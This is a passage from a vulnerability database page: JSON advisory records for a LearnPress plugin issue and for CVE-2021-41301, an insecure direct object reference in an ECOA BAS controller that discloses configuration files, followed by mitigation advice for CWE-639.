"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.9.1/inc/rest-api/v1/frontend/class-lp-rest-lazy-load-controller.php#L118"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.9.1/inc/rest-api/v1/frontend/class-lp-rest-lazy-load-controller.php#L137"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.9.1/inc/user/abstract-lp-user.php#L680"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Flearnpress/tags/4.3.9.1\u0026new_path=%2Flearnpress/tags/4.4.0"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b5e8cfd-989e-4a64-abb0-9daa22df46a4?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2QV4-869G-77JR
Vulnerability from github – Published: 2022-05-24 19:16 – Updated: 2022-05-24 19:16ECOA BAS controller is vulnerable to configuration disclosure when direct object reference is made to the specific files using an HTTP GET request. This will enable the unauthenticated attacker to remotely disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.
{
"affected": [],
"aliases": [
"CVE-2021-41301"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-30T11:15:00Z",
"severity": "CRITICAL"
},
"details": "ECOA BAS controller is vulnerable to configuration disclosure when direct object reference is made to the specific files using an HTTP GET request. This will enable the unauthenticated attacker to remotely disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.",
"id": "GHSA-2qv4-869g-77jr",
"modified": "2022-05-24T19:16:13Z",
"published": "2022-05-24T19:16:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41301"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-5137-730a6-1.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation
For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.
Mitigation
Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.
Mitigation
Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.
No CAPEC attack patterns related to this CWE.